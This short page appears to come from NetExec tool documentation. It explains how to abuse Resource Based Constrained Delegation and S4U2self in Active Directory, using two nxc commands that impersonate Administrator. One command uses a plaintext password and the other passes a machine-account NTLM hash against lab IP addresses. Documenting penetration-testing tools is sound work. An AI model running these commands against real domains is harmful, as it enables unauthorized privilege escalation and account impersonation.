Delegation
Resource Based Constrained Delegation (RBCD) and
Last updated
Was this helpful?
Resource Based Constrained Delegation (RBCD) and
Last updated
Was this helpful?
If you have an object with the msDS-AllowedToActOnBehalfOfOtherIdentity attribute set to an account you control you can use the impersonate flag inside NetExec to automatically execute the Resource Based Constrained Delegation and impersonate any user:
nxc smb 192.168.56.11 -u jon.snow -p iknownothing --delegate AdministratorIf you have a computer account you can (nearly) always get local administrator with the s4u2self extension:
nxc smb 192.168.56.10 -u 'KINGSLANDING$' -H 220fc1990391bdc183d1a68c389c0229 --delegate Administrator --self
